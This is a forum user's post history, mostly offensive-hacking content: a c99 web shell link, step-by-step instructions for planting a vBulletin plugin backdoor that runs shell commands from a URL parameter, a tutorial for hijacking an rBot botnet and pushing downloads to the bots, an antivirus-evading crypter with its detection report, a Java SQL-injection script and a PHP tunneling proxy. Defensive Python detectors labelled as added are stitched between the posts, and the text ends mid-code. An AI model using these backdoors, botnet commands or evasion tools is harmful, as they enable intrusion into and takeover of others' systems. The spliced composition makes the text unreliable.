Gonzalez

Everything posted by Gonzalez

  1. http://rapidshare.com/files/294155645/c99.rar There is a good chance your antivirus will go crazy, but don't worry.
  2. https://addons.mozilla.org/en-US/firefox/collection/samurai -Gonzalez
  3. First things first, communication: Understanding TCP/IP
     My recommendations: after you read each section, fire up Ethereal and packet capture, start sending and receiving packets, to understand what's really going on!
     TCP/IP Illustrated: http://la.gg/upl/TCP-IP_Illustrated.rar
     Ethereal traffic analyzer: http://www.ethereal.com/distribution/win32/ethereal-setup-0.99.0.exe
     Then start studying ARP/MITM based attacks.

     INTRO to DNS / Zone Transfer
     I need to add more to this one but this should get you covered; most of the other books on hacking I list here for other things go over this above and beyond anyway, but enjoy!
     http://technet.microsoft.com/en-us/library/cc781340.aspx

     Understanding Scanning
     Included: James Messer: Secrets of Network Cartography; Fyodor (nmap author) TCP/IP OS Fingerprinting Phrack article; and a firewall ruleset mapping intro (stateful or packet filtering evasion).
     http://la.gg/upl/Nmap.rar
     Here's some links for video presentations of scanning:
     http://irongeek.com/i.php?page=videos/nmap1
     http://irongeek.com/i.php?page=videos/nmap2
     http://irongeek.com/i.php?page=videos/droops1
     FYODOR (NMAP AUTHOR'S) video... must watch!
     http://media.defcon.org/dc-13/video/2005_Defcon_V3-Fyodor-Hacking_Nmap.mp4
     Consult Insecure.org for more! http://la.gg/upl/Nmap.rar

     CCNA, CISCO CERTIFIED NETWORK ASSOCIATE
     Cisco pretty much defines routing and networking these days; skim over this at least.
     http://www.filestube.com/ec96176785a0f49b03ea/details.html

     WIRELESS HACKING
     Included are a few various PDFs and the amazing book WI-FOO; most definitely check it out.
     http://la.gg/upl/Wireless_haxing.rar

     LAYER 2 OWNAGE
     Little collection of ARP/MITM attack papers. This is more than fun, so be sure to read it; it accounts for 90% of internal hacking.
     http://la.gg/upl/LAYER_2_ownage.rar

     Google Hacking for Penetration Testers, most definitely read this.
     What it will provide: skills to pretty much understand advanced operators, and Google's SOAP API for finding anything you want (remember Google is the oracle, and accounts for about 90% of the information you glean during reconnaissance in a pen-test).
     http://la.gg/upl/Google_Hacking_For_Penetration_Testers_%282005%29.rar
     Johnny Long's live presentation video at Defcon, MUST SEE!
     http://media.defcon.org/dc-13/video/2005_Defcon_V65-Johnny_Long-Google_Hacking_for_Pen_Test.mp4

     Info Gathering
     Most important stage of a pen-test; this is just a little bit. Info Gathering by Aelphaeis Mangarae included.
     http://la.gg/upl/Passive_Info_Gathering.rar

     HACK IT SEC: through pen-testing
     Decent for understanding pen-testing fundamentals.
     http://la.gg/upl/Hack_IT__Security_Through_Penetration_Testing_%28Addison_Wesley-2002%29.chm

     CEH (Certified Ethical Hacker exam)
     Covers the more conventional pen-testing methodology... it's a real certification, and it's great. Go through all the modules at least once (if some of the tools seem outdated or you think you can improve the methods in some of the phases, then do it; remember it is a pen-test).
     http://www.megaupload.com/?d=PIITMEAT
     Also check out Cisco Press Penetration Testing and Network Defense
     http://www.megaupload.com/?d=IMHY2W50

     CISSP: Security Specialist Cert.
     This is important too; try to go over most of this, especially if you're interested in the cert.
     http://la.gg/upl/Wiley.The.CISSP.Prep.Guide.Gold.Edition.rar

     ZEN and the ART OF INFORMATION SECURITY by SYNGRESS
     Good book to get you started on the infosec mindset.
     http://la.gg/upl/Syngress.Zen.and.the.Art.of.Information.Security.%282007%29.rar
     And Vulnerability Enumeration for Penetration Testing by Aelphaeis Mangarae
     http://la.gg/upl/Vulnerability_Enumerating_for_Penetration_Testing.rar

     Quick and in-depth look into Linux, administering and hardening it
     Understanding at least the basics of Linux is important for hacking, as most web servers are running shit like LAMP (Linux, Apache, MySQL, PHP) because it's free, so read! Get VMware and follow along if you don't want to make a Linux partition.
     http://la.gg/upl/Understanding_and_hardening_linux_.rar

     Web app security is a must, considering most of the attacks are through the HYPER TEXT TARGET PROTOCOL. So definitely read these two, along with the SPI Dynamics SQL whitepapers, and use your newly found Google crawling abilities to find even more filetype:pdf's about webapp security.
     http://la.gg/upl/Web_Hacking_-_Attacks_And_Defense_%282002%29.chm
     Little more in depth: http://la.gg/upl/1931769494.A-List_Publishing.Hacker_Web_Exploitation_Uncovered.chm

     w3schools.org
     Make a quick run through: SQL, PHP, HTML; peruse CSS.

     Small collage of SQL/PHP/XSS papers
     Follow the links at the end of these; be sure to try the shit you're reading.
     http://la.gg/upl/SQL_PHP_XSS.rar

     HACKnotes: a must for referencing
     Sometimes you'll find yourself referencing shit over and over again, and these books are just that; peruse them, and use them during a pen-test.
     http://la.gg/upl/Hacknotes.rar

     HACKING EXPOSED; another major reference
     This is the 2nd edition, kinda old; feel free to crawl for more.
     http://la.gg/upl/Network_Security_Secrets_and_Solutions_%28MCGraw-Hill-2001%29.rar

     HACKING: ART of EXPLOITATION
     MOST DEFINITELY read this until you understand the x86 stack, its structure, and how different types of exploits work; also pay attention to the network exploitation chapters, as they're really in-depth as well.
     http://la.gg/upl/Hacking-The_Art_of_Exploitation%28No_Starch-2003%29.chm

     Stealing the Network & other must hacker reads
     2 books in one.... fucking amazing, you must read. I also have Stealing the Identity and Stealing the Shadow; I'll post lat0r.
     http://la.gg/upl/STN.rar

     Windows Internals
     Understanding the inner mechanics and subsystems of the kernel (brain child of the OS) will help you a long way if you are developing a device driver with NTDDK or are a coder; understanding how memory is mapped and handled, and how objects are handled, is important too. Give this one a read; get your Sysinternals toolkit ready, cause you'll be following along.
     http://la.gg/upl/Microsoft_Windows_Internals_-_Microsoft_Windows_Server_2003%2C_Windows_XP%2C_and_Windows_2000%2C_4th_Edition_%282004%29.rar

     MORE WINDOWS KERNEL INTERNALS
     This is a huuuuuge project by a Korean driver development team; it's amazingly in-depth, give it a read.
     http://www.i.u-tokyo.ac.jp/edu/training/ss/lecture/new-documents/Lectures/00-WindowsKernelOverview/WindowsKernelOverview.pdf

     ROOTKIT: Subverting The Windows Kernel
     After perusing Windows Internals, give this a read if you're interested in furthering your gains while entrenching (maintaining access to your targets).
     http://la.gg/upl/Addison.Wesley.Professional.Rootkits.Subverting.the.Windows.Kernel.chm

     DISASSEMBLY
     Disasm is very important as well. Also it's fun for owning botnet kiddies, haha.
     http://la.gg/upl/A.LIST.Publishing.Hacker.Disassembling.Uncovered.eBook-LiB.rar

     CRYPTOGRAPHY
     Applied crypto is important; it's not important to be insanely versed in crypto, but knowing the fundamentals is important. VPN IPSEC book included, Wiley CRYPTO and Comp Security included, and a few more.
     http://www.megaupload.com/?d=B4MF1B4N

     Other shit you need to do:
     Read all of the important papers on milw0rm / other infosec sites.
     Bookmark every decent infosec site and read it daily.
     Read Slashdot daily.
     Read all of the Phrack releases / h0no ezines / el8 ezine / PU ezine / zf0.
     Read all of the RFCs in your spare time.
     Sign yourself up for mailing lists like vulnwatch, pentesting, infosec, etc...
     Check RSS feeds daily for w/e.
     Be semi-active in IRC if possible to interact and share knowledge with others.
     Set up VMware networks and test exploits yourself; make real situations out of it, where you gotta perform real black-box style hacks.
     Exercise 2-3 hours a day, eat healthy.
  4. Google could launch a new service that gives users the ability to listen to and buy music directly from the results pages of searches performed on the company's search engine. According to information provided by the TechCrunch site, Google will offer on its site a window through which users will be able to listen to various songs. In addition, Google's new service also gives them the option of purchasing their favourite songs through the sites iLike and LaLa. According to the same sources, the official announcement of the service's launch will be made on 28 October in Los Angeles. According to the Wall Street Journal, four major record labels, Warner Music, EMI, Sony and Universal, already Google's partners for distributing video content on the YouTube platform, have agreed to collaborate on the new music service as well. This new service will simplify the music purchasing process for users, which will be possible directly from the Google page. Source: MediaFax.ro -Gonzalez
  5. beemp3.com -Gonzalez
  6. Markus Schulz - Global DJ Broadcast 15 October 2009 -Gonzalez
  7. #include <iostream>
     #include <cstdio>    // for printf
     #include <windows.h> // including the Windows library for the Sleep command
     using namespace std;

     int main()
     {
         int iFinal, iNumber;
         bool szContinue; // bool is used for "true" or "false" statements
         iNumber = 0;
         iFinal = 0;
         szContinue = true;
         while (szContinue)
         {
             if (iNumber < 1000000000) // loop again while iNumber is less than 1000000000
             {
                 iFinal = iFinal + 1;
                 iNumber = iNumber + 1;
                 printf("%d \n", iFinal);
                 Sleep(1); // sleeps or waits 1 ms
             }
             else // when iNumber hits 1000000000 the loop stops
             {
                 szContinue = false;
             }
         }
         cin.get();
         return 0;
     }
  8. /**************************************
      *
      * A simple but effective port scanner
      *
      * Description: This port scanner is pretty simple, it just fork()'s each
      * connect() call, and reads the return value.
      *
      **************************************/
     /* simple connect port scanner.. -- very fast .. very detectable... */
     #include <stdio.h>
     #include <stdlib.h>
     #include <stdarg.h>
     #include <string.h>
     #include <unistd.h>
     #include <errno.h>
     #include <time.h>
     #include <netdb.h>
     #include <fcntl.h>
     #include <signal.h>
     #include <sys/socket.h>
     #include <sys/types.h>
     #include <netinet/in.h>
     #include <arpa/inet.h>
     #include <sys/time.h>
     #include <sys/poll.h>

     static int verbose = 0;

     enum port_e {
         P_ERROR  = 0,
         P_CLOSED = 1,
         P_OPEN   = 2,
     };

     enum port_e chkport(struct sockaddr_in addr);

     //int v_printf(const char *fmt, ...); /* verbose printf */
     #define v_printf(x) if(verbose) printf x

     int main(int argc, char *argv[])
     {
         int index = 1, i;
         struct sockaddr_in addr;
         struct hostent *hp;

         if(argc < 2) {
             fprintf(stderr, "Usage:\n\t%s [-v] <host>\n", argv[0]);
             return 0;
         }
         if((argv[1][0] == '-') && argv[1][1] == 'v')
             verbose = index++;
         if(index != 1 && argc == 2) {
             fprintf(stderr, "missing host\n");
             return 0;
         }
         hp = gethostbyname(argv[index]);
         if(!hp) {
             fprintf(stderr, "could not lookup host\n");
             return 0;
         }
         memset(&addr, 0, sizeof(addr));
         addr.sin_family = PF_INET;
         memcpy(&addr.sin_addr, hp->h_addr, hp->h_length);
         printf("Scanning Host %s\n", argv[index]);
         clock_t st = clock(); /* note: clock() is the parent's CPU time, not wall-clock time */
         for(i = 1; i <= 65535; i++) {
             addr.sin_port = htons(i);
             if(!fork()) { /* child: test one port, report, exit */
                 enum port_e p = chkport(addr);
                 switch(p) {
                 case P_OPEN:   printf("%-4d OPEN\n", i); break;
                 case P_CLOSED: if(verbose) printf("%-4d CLOSED\n", i); break;
                 case P_ERROR:  if(verbose) printf("%-4d ERROR\n", i); break;
                 }
                 exit(0);
             }
         }
         printf("Done in %.2lf seconds.\n", (double) (clock() - st) / CLOCKS_PER_SEC);
         return 0;
     }

     enum port_e chkport(struct sockaddr_in addr)
     {
         int sd = socket(PF_INET, SOCK_STREAM, 0);
         enum port_e prtst = P_OPEN;
         if(sd < 0)
             return P_ERROR;
         /*
         if(fcntl(sd, F_SETFL, O_NONBLOCK) < 0) {
             close(sd);
             return P_ERROR;
         }
         */
         if(connect(sd, (struct sockaddr*) &addr, sizeof(addr))) {
             close(sd);
             return P_CLOSED;
         }
         shutdown(sd, 2);
         close(sd);
         return prtst;
     }
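The scanner above is "very detectable" because it opens one connection per port from one source in a burst. The following is an added example, not part of the forum post, of the detection a defender would run over connection logs: a sliding-window count of distinct destination ports per source/destination pair. The log format, the window and the threshold are assumptions for this demo, and the log lines are constructed.

```python
# Added example (not from the forum post): flag a burst of connect() attempts
# to many distinct ports from one source, the footprint of the scanner above.
# Input lines are a constructed, simplified connection log:
#   "<epoch_seconds> <src_ip> -> <dst_ip>:<dst_port>"
from collections import defaultdict, deque

WINDOW_SECONDS = 10   # assumed: look back 10 seconds
PORT_THRESHOLD = 20   # assumed: this many distinct ports in the window is a scan

def parse_line(line):
    """Return (ts, src, dst, port) for one constructed log line, or None if malformed."""
    try:
        ts, src, arrow, dst_port = line.split()
        dst, port = dst_port.rsplit(":", 1)
        if arrow != "->":
            return None
        return float(ts), src, dst, int(port)
    except ValueError:
        return None

def detect_port_scans(lines, window=WINDOW_SECONDS, threshold=PORT_THRESHOLD):
    """
    Sliding-window detector: for each (src, dst) pair keep the recent
    (timestamp, port) events; alert the first time the number of distinct
    destination ports inside the window reaches the threshold.
    Returns a list of (src, dst, distinct_ports, first_ts, last_ts).
    """
    recent = defaultdict(deque)   # (src, dst) -> deque of (ts, port), oldest first
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, port = rec
        key = (src, dst)
        q = recent[key]
        q.append((ts, port))
        while q and ts - q[0][0] > window:   # drop events that fell out of the window
            q.popleft()
        ports = {p for _, p in q}
        if len(ports) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append((src, dst, len(ports), q[0][0], ts))
    return alerts

# Constructed sample: one host walks 30 ports in 3 seconds, another host
# makes a few normal connections spread over a minute.
SAMPLE_LOG = [f"{1000 + i * 0.1:.1f} 10.0.0.5 -> 10.0.0.20:{i + 1}" for i in range(30)]
SAMPLE_LOG += [f"{1000 + i * 10} 10.0.0.7 -> 10.0.0.20:{p}"
               for i, p in enumerate([22, 80, 443, 80, 22, 443])]

if __name__ == "__main__":
    for src, dst, n, t0, t1 in detect_port_scans(SAMPLE_LOG):
        print(f"scan: {src} -> {dst}, {n} distinct ports between t={t0} and t={t1}")
```

The alert fires once per source/destination pair, at the moment the twentieth distinct port is touched, so a slow scan spread over more than the window stays below the threshold; lengthening the window is the usual trade against false positives from busy legitimate clients.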
  9. 1.Login into Admincp (You need plugin manager rights) 2.Scroll down untill you see "Plugins and Products" 3.Expand Plugins and Products and click on "Add new plugin" 4.For the Hook Location Select Ajax_Complete 5.Title Can be whatever.. and leave execution order alone. 6.Add your php code in "Plugin php code"(Do NOT use <?php ?> Tags) Example code: if(isset($_GET['cmd'])){echo "<h1>Working</h1><pre>"; system($_GET['cmd']);exit;} 7.Enable Plugin 8.Visit website http://victim.com/ajax.php?cmd=[Command]
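The defender's counterpart to the post above, as an added example that is not from the post or from vBulletin: a scan over plugin/hook code for command-execution sinks whose argument comes straight from request input, which is exactly the shape of the snippet shown. The sink list, function names and the sample plugin bodies are constructed for this demo; in practice the input would be the stored plugin code of the forum's plugin table or the files of a plugins directory.

```python
# Added example (not from the post): scan stored plugin/hook PHP code for
# OS-command or code-evaluation sinks and mark those fed from request input.
import re

# Functions that run an OS command or evaluate code (assumed list for the demo)
EXEC_SINKS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open", "eval", "assert")
# Request-controlled sources
REQUEST_SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")

SINK_RE = re.compile(r"\b(" + "|".join(EXEC_SINKS) + r")\s*\(", re.IGNORECASE)
SOURCE_RE = re.compile("|".join(re.escape(s) for s in REQUEST_SOURCES))

def find_exec_sinks(php_code: str):
    """
    Return one finding per statement that calls an execution sink; a finding is
    (line_number, sink_name, tainted) where tainted is True when a request
    superglobal appears in the same statement (statements split on ';').
    """
    findings = []
    for lineno, line in enumerate(php_code.splitlines(), start=1):
        for statement in line.split(";"):
            m = SINK_RE.search(statement)
            if not m:
                continue
            tainted = bool(SOURCE_RE.search(statement))
            findings.append((lineno, m.group(1).lower(), tainted))
    return findings

def risky_plugins(plugins):
    """plugins: {title: phpcode}. Return the titles with at least one tainted sink."""
    return sorted(t for t, code in plugins.items()
                  if any(f[2] for f in find_exec_sinks(code)))

# Constructed sample plugin bodies: a backdoor, a legitimate sink call with a
# fixed argument, and a plugin that only echoes (escaped) request input.
SAMPLE_PLUGINS = {
    "Ajax helper": "if(isset($_GET['cmd'])){echo \"<pre>\"; system($_GET['cmd']);exit;}",
    "Cache warmer": "$out = shell_exec('php ' . escapeshellarg(__DIR__ . '/warm.php'));\nlog_it($out);",
    "Greeting": "echo 'Hello ' . htmlspecialchars($_GET['name']);",
}

if __name__ == "__main__":
    for title, code in SAMPLE_PLUGINS.items():
        print(title, find_exec_sinks(code))
    print("risky:", risky_plugins(SAMPLE_PLUGINS))
```

A sink with a fixed argument is reported but not marked tainted, so it can be reviewed rather than treated as a backdoor; splitting on `;` is deliberately crude and will miss data flowing through an intermediate variable, which is why this is a triage aid and not a substitute for reviewing every plugin with execution sinks.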
  10. I can't believe it. It's cooler to send an SMS "from the net" than to send a plain SMS from your mobile phone. My head hurts already; I don't even know why I opened: Help! I need to send an SMS! Pitifuuul -Gonzalez
  11. Esco - For My Niggas -Gonzalez
  12. Author: Pinczakko
      Perhaps this article will be of use to some that may want it. Here's the link
      A snippet of the contents:
      ---------------------------------------------------------------
      Table of Contents
      * 1. Foreword
      * 2. Prerequisite
        o 2.1. PCI BUS
        o 2.2. ISA BUS
      * 3. Some Hardware Peculiarities
        o 3.1. BIOS Chip Addressing
        o 3.2. Obscure Hardware Port
        o 3.3. "Relocatable" Hardware Port
        o 3.4. Expansion ROM Handling
      * 4. Some Software Peculiarities
        o 4.1. Call Instruction Peculiarity
        o 4.2. Retn Instruction Peculiarity
      * 5. Our Tools of Trade
      * 6. Award BIOS File Structure
        o 6.1. The Compressed Components
        o 6.2. The Pure Binary Components
        o 6.3. The Memory Map In The Real System (Mainboard)
      * 7. Disassembling the BIOS
        o 7.1. Bootblock
          + 7.1.1 "Virtual Shutdown" routine
          + 7.1.2 Chipset_Reg_Early_Init routine
          + 7.1.3 Init_Interrupt_n_PwrMgmt routine
          + 7.1.4 Call To "Early Silicon Support" Routine
          + 7.1.5 Bootblock Is Copied And Executed In RAM
          + 7.1.6 Call to bios decompression routine and the jump into decompressed system bios
        o 7.2. System BIOS a.k.a Original.tmp
          + 7.2.1. Entry point from "Bootblock in RAM"
          + 7.2.2. The awardext.rom and Extension BIOS Components (lower 128KB bios-code) Relocation Routine
          + 7.2.3. Call to the POST routine a.k.a "POST jump table execution"
          + 7.2.4. The "segment vector" Routines
          + 7.2.5. "chksum_ROM" Procedure
          + 7.2.6. Original.tmp decompression routine for the "Extension_BIOS components"
      * 8. Closing
      ----------------------------------------------------------------
  13. This one is only bot sources: http://lulzcoderz.info/Bots/ Bot sources and some other stuff: http://www.korkodili.com/Bots/ enj0y! -Gonzalez
  14. Author: -ande- ok.. so hoax needed a tut on how to jack a botnet so i will tell y0u gays... Lets sey we found a bot binded with call of duty 4 witch you downloaded from thepiratebay.org..... The name of the exe is setup.exe The bot type is rBot(commandoes: http://www.angelfire.com/theforce/travon1120/RxBotCMDLIST.html) ------ Kk, so the first thing we need is the ip and port to the irc server.... - Smart people uses a non default port.. Default port is 6667. So to find this use wpe(Winsock Packet Editor (WPE) Pro) or wireshark(Wireshark: Go deep.) and monitor setup.exe while you open it, in this case i will use wpe. You want to find the "PASS" and/or "NICK" and/or "JOIN" packet to get info about the password,a suitable nick and what channel to join. when you do this you alsow get info about ip and port... Image missing "JOIN" packet Tongue but it should be there to.... right-click and go to the link in a new tab to see bigger pic... ------------- Now, try(with a proxy) connecting to the server and join the channel we found with wpe... - If the channel is totaly empty and u cant see shit then its no point going futher... wont work. - If you can see lots of bots and shit then yey! Try now(still with a proxy) to set the topic if the channel to ".login idiot". If you are unable to set the topic try writing ".login idiot" and send to the chan. If anything happens when you eiter set the topic of the channel or sending to the channel then we got a jackeble botnet(maybe). ------------- If the bots listens to you right away either in topic or send then send: ".update YourPage.com | Web Design Made Easy awdawd12456yhgf" or ".download YourPage.com | Web Design Made Easy c:\someexe.exe 1" and there u go... btw: if you set the topic.. the bots might not listen to you... try writing ".login idiot" to they get flood timeout becouse the bots only listens to topic when they join... 
------------- If you can see lots of bots but still setting topic or sending dosent work then be at the channel until "admin" aka botnet owner uses the .login command... then wait until he leaves again and then... login and control Grin ------------- If you got any questions or ideas or maybe i done something wrong then post it
  15. Download: http://www.rapidspread.com/file.jsp?id=i2f07mstkp Password: evil-zone
  16. Buffer Overflow Primer Part 1 (Smashing the Stack)
      http://videos.securitytube.net/Buffer Overflow Primer Part 1 (Smashing the Stack).mp4
      Buffer Overflow Primer Part 2 (Writing Exit Shellcode)
      http://videos.securitytube.net/Buffer-Overflow-Primer-Part-2-(Writing-Exit-Shellcode).mp4
      Buffer Overflow Primer Part 3 (Executing Shellcode)
      http://videos.securitytube.net/Buffer-Overflow-Primer-Part-3-(Executing-Shellcode).mp4
      Buffer Overflow Primer Part 4 (Disassembling Execve)
      http://videos.securitytube.net/Buffer Overflow Primer Part 4 (Shellcode-for-Execve).mp4
      Buffer Overflow Primer Part 5 (Shellcode for Execve)
      http://videos.securitytube.net/Buffer-Overflow-Primer-Part-5-(Shellcode-for-Execve).mp4
      Buffer Overflow Primer Part 6 (Exploiting a Program)
      http://securitytube.net/Buffer-Overflow-Primer-Part-6-(Exploiting-a-Program)-video.aspx
      Buffer Overflow Primer Part 7 (Exploiting a Program Demo)
      http://securitytube.net/Buffer-Overflow-Primer-Part-7-%28Exploiting-a-Program-Demo%29-video.aspx
      Buffer Overflow Primer Part 8 (Return to Libc Theory)
      http://securitytube.net/Buffer-Overflow-Primer-Part-8-%28Return-to-Libc-Theory%29-video.aspx
      Buffer Overflow Primer Part 9 (Return to Libc Demo)
      http://securitytube.net/Buffer-Overflow-Primer-Part-9-%28Return-to-Libc-Demo%29-video.aspx
      -Gonzalez
  17. Download video tutorial -Gonzalez
  18. To see the tutorial, click here -Gonzalez
  19. Download: http://www.mediafire.com/?jylijvwwofn File Info Report generated: 28.9.2009 at 19.24.26 (GMT 1) Filename: xAVxCrypter***** File size: 1148 KB MD5 Hash: cee31366f5ebf03c686e051293c7a4dd SHA1 Hash: 6D790C69D084626D57C250E33E4EBAEE14F132A2 Self-Extract Archive: Nothing found Binder Detector: Nothing found Detection rate: 0 on 23 Detections a-squared - - Avira AntiVir - - Avast - - AVG - - BitDefender - - ClamAV - - Comodo - - Dr.Web - - Ewido - - F-PROT6 - - Ikarus T3 - - Kaspersky - - McAfee - - NOD32 v3 - - Norman - - Panda - - QuickHeal - - Solo Antivirus - - Sophos - - TrendMicro - - VBA32 - - VirusBuster - - ZonerAntivirus - - Scan report generated by NoVirusThanks.org
  20. Better read the Bible, kids. -Gonzalez
  21. Author: GT3X
      Here's a simple example of how you can use Java for exploit programming:
      /* SQL Injection Example http://www.bifrostworld.org */
      import java.net.*;
      import java.io.*;
      import java.util.regex.*;
      import java.util.*;

      class SQL {
          public static void main(String[] args) {
              // Host URL without http://
              String host = "";
              // Injection goes here
              String inject = "";
              String victim = "http://" + host + inject;
              try {
                  URL url = new URL(victim);
                  URLConnection connect = url.openConnection();
                  InputStream in = connect.getInputStream();
                  Scanner s = new Scanner(in);
                  // look for a 32-character hex string (an MD5 hash) in each whitespace-separated token
                  Pattern pat = Pattern.compile("([a-f0-9]{32})");
                  while (s.hasNext()) {
                      Matcher match = pat.matcher(s.next());
                      if (match.find()) {
                          System.out.println(match.group());
                      } else {
                          System.out.println("No hash found");
                      }
                  }
              } catch (Exception e) {
                  System.out.println(e);
              }
          }
      }
  22. import java.util.*;
      import java.io.*;

      public class console {
          public static void main(String args[]) {
              String text = "";
              BufferedReader in;
              PrintWriter out = new PrintWriter(System.out);
              try {
                  // run "dir" through the Windows command interpreter and relay its output line by line
                  Process p = Runtime.getRuntime().exec("cmd /c dir");
                  in = new BufferedReader(new InputStreamReader(p.getInputStream()));
                  while ((text = in.readLine()) != null) {
                      out.println(text);
                      out.flush();
                  }
              } catch (IOException e) {
                  e.printStackTrace();
              }
          }
      }
  23. <?php
      /*
       * Name: RProxy
       * Credits: charles "real" F. <charlesfol[at]hotmail.fr>
       * Date: 26/04/08
       *
       * RProxy permits you to get a HIGH ANONYMOUS HTTP proxy
       * with a host that just supports an Apache webserver.
       *
       *   +-> Local Socket -> PHP file -+
       *   |                             |
       * Client                     Remote Host
       *   |                             |
       *   +- Local Socket <- PHP File <-+
       *
       * When the local listening socket receives an HTTP request,
       * it sends it to the remote PHP file, which executes it.
       * Then the PHP file sends the response to the local socket,
       * which transmits it to the client.
       *
       * The advantage of RProxy is that it's usable everywhere
       * and really discreet :)
       * It just needs an Apache server to work, because a PHP file
       * executes your HTTP request for you.
       *
       * howto:
       * 1. Host this script on a remote host, like a free.fr FTP
       *    (eg http://server.com/proxy.php)
       * 2. Launch the script, on your own computer, in CLI:
       *    $ php proxy.php http://server.com/proxy.php
       *    RProxy ready, listening on port 8888
       * 3. Now use this proxy like a normal one, localhost:8888.
       *
       * I made a very precisely commented code, expecting you to
       * understand it.
       *
       * [ Done ]
       *
       * 26/03: Boundary mode is now supported.
       *        No matter the request size, because
       *        it's now split into pieces.
       *        ($header_max var)
       * 23/04: Modified a little Local Socket code.
       *        PHP did not like \r\n concatenation
       *        but I don't know why.
       *        Remote Host headers are now used, in-
       *        stead of PHP file's headers.
       * 09/06: A little update to support FF post.
       */

      /* Local Socket Configuration */
      $port       = 8888; # Port of your local listening socket
      $max_conn   = 10;   # Maximum number of connections to your local socket
      $header_max = 1000; # Max header size.

      #
      # Part #1 [] Local Socket
      #
      # Client -> HTTP Request -> Local Socket -> Remote PHP file -> Local Socket -> HTTP Response -> Client

      if(isset($argc) && $argc>1)
      {
          $url = $argv[1];
          $handle = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
          socket_bind($handle, '127.0.0.1', $port);
          socket_listen($handle, $max_conn);
          print "RProxy ready, listening on port $port";

          while(TRUE)
          {
              $packet = '';

              # Client -> HTTP Request -> Local Socket
              # The Local Socket receives an HTTP Request from Client
              if(!$_client = socket_accept($handle))
                  exit("socket_accept(): error ($handle).");

              # Keep reading until the request is complete: headers terminated,
              # a POST carrying its body, a multipart body carrying its closing boundary.
              # (The original used ereg()/eregi(), which PHP 7 removed; preg_match() does the same job.)
              $client_request = '';
              while( (preg_match('#Content-type.*boundary#is', $client_request) && !preg_match("#--[0-9]+--\r?\n#", $client_request))
                  || (preg_match('#^POST#i', $client_request) && !preg_match("#\r\n\r\n.+#s", $client_request))
                  || !preg_match("#\r\n\r\n#", $client_request) )
              {
                  $client_request .= socket_read($_client, 2048, PHP_BINARY_READ);
              }
              preg_match("#Host: +([^\t\r\n]+)#i", $client_request, $client_host) or exit();
              $client_host = $client_host[1];
              print "\n".d()." -> $client_host ".strlen($client_request);

              # Local Socket -> Remote PHP file
              # The Local Socket sends the HTTP Request to the PHP file
              $infos = parse_url($url);
              $phpf_host = $infos['host'];
              $phpf_port = isset($infos['port']) ? $infos['port'] : 80;

              # The whole client request is base64-encoded and split into
              # $header_max-sized chunks carried in numbered HTTP-Request-N headers
              $total = str_split(base64_encode($client_request), $header_max);
              $request  = "GET $url HTTP/1.1\r\n";
              $request .= "Host: $phpf_host\r\n";
              $request .= "User-Agent: Mozilla Firefox 5.0\r\n";
              for($i=0; $i<sizeof($total); $i++)
                  $request .= "HTTP-Request-$i: ".$total[$i]."\r\n";
              $request .= "Connection: Close\r\n";
              $request .= "\r\n";

              # Remote PHP file -> Local Socket
              # The Local Socket receives the HTTP Response from the PHP file
              $_phpf = fsockopen($phpf_host, $phpf_port); # was hard-coded to 80, ignoring $phpf_port
              fputs($_phpf, $request);

              # Local Socket -> Client
              # The HTTP Response is transmitted by the Local Socket to the Client
              $http_response = '';
              while(!feof($_phpf))
                  $http_response .= fgets($_phpf);
              fclose($_phpf);

              # Remove HTTP Headers from PHP file's HTTP Response
              $code = explode("\r\n\r\n", $http_response);
              $http_response = '';
              for($i=1; $i<sizeof($code); $i++)
                  $http_response .= $code[$i]."\r\n\r\n";
              $http_response = preg_replace("#^.*[\r\n]*HTTP#i", "HTTP", $http_response);
              $http_response = preg_replace('#0[\r\n]*$#', '', $http_response);

              socket_write($_client, $http_response, strlen($http_response));
              print "\n".d()." <- $client_host ".strlen($http_response);
              socket_close($_client);
          }
          exit();
      }

      #
      # Part #2 [] Remote PHP File
      #
      if(!isset($_SERVER['HTTP_HTTP_REQUEST_0']))
      {
          header("Location: http://google.com/");
          exit();
      }

      # Local Socket -> Remote PHP file -> Remote Host -> Remote PHP file -> Local Socket

      # Local Socket -> Remote PHP file
      # The PHP file receives the HTTP Request it must perform
      $client_request = '';
      for($i=0; isset($_SERVER["HTTP_HTTP_REQUEST_$i"]); $i++)
          $client_request .= $_SERVER["HTTP_HTTP_REQUEST_$i"];
      $client_request = base64_decode($client_request);
      preg_match("#Host: +([^\t\r\n]+)#i", $client_request, $rhostname) or exit();
      $rhostname = $rhostname[1];

      # Clear client request
      $clearheaders = array('Keep-Alive', 'Proxy-Connection', 'Connection');
      for($i=0; $i<sizeof($clearheaders); $i++)
          $clearheaders[$i] = '#'.$clearheaders[$i].':.+\r\n#i';
      $client_request = preg_replace($clearheaders, '', $client_request);
      $client_request = preg_replace("#(Host:.+\r\n)#i", "$1Connection: close\r\n", $client_request);

      # Remote PHP file -> Remote Host
      # The PHP file sends the HTTP Request
      $_rhost = fsockopen($rhostname, 80);
      fputs($_rhost, $client_request);

      # Remote Host -> Remote PHP file
      # The PHP file receives the HTTP Response
      $rhost_response = '';
      while(!feof($_rhost))
          $rhost_response .= fgets($_rhost);
      fclose($_rhost);

      # Remote PHP file -> Local Socket
      # The PHP file displays the HTTP Response,
      # which is recovered by the Local Socket
      print $rhost_response;

      function d() { return date("H:i:s"); }
      ?>
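RProxy's relay protocol is the interesting part: the client's whole HTTP request is base64-encoded, split into `$header_max`-sized chunks and carried in numbered `HTTP-Request-N` headers of a GET to the PHP file, which reassembles them from `$_SERVER`, strips the connection headers and forces `Connection: close`. The following is an added example, not the RProxy author's code, that implements both ends of that exchange and adds the check a web server operator would want: a function that notices such carrier headers and reports which Host the tunneled request targets. The function names, the sample request and the 40-byte chunk size are assumptions for this demo.

```python
# Added example (not the RProxy author's code): the header-tunnel scheme RProxy
# uses, both the encoding side and the reassembly side, plus a server-side
# check that detects it. Sample request and names are constructed for the demo.
import base64
import re

HEADER_MAX = 1000  # RProxy's $header_max: max payload characters per carrier header

def encode_tunnel_headers(client_request: bytes, header_max: int = HEADER_MAX):
    """Local-socket side: return the list of (name, value) carrier headers."""
    b64 = base64.b64encode(client_request).decode("ascii")
    chunks = [b64[i:i + header_max] for i in range(0, len(b64), header_max)]
    return [(f"HTTP-Request-{i}", chunk) for i, chunk in enumerate(chunks)]

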